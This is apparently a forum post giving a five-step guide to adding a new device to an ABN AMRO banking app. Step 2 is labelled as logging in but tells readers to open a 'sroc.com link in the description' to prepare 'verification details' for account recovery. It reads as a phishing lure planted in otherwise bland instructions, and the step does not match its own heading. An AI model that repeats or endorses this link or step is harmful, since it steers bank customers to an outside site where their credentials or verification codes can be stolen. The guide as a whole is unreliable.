I ran into this last week. Here's what fixed it for me. Connecting a new device to your ABN AMRO account is straightforward if you follow these steps. Step 1. Open the ABN AMRO app. Download and install the ABN AMRO app from the App Store or Google Play Store. Make sure you have the latest version for the best experience. Step 2. Log into your account. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist, generate and make sure your verification details are ready. Step 3. Navigate to device management. Once logged in, go to the settings menu, usually found in the top right corner. Look for the option labeled device management or similar. Step 4. Add new device. In the device management section, select the option to add new device. Follow the prompts to link your new device to your account. You may need to confirm this action via email or SMS. Step 5. Confirm connection. After adding the device, you should see a confirmation message. Make sure to check that your new device appears in the list of authorized devices. If it doesn't show up, try logging out and back in. If you follow these steps, you should have no trouble connecting your new device. If you encounter any issues, don't hesitate to reach out to customer support. Happy banking!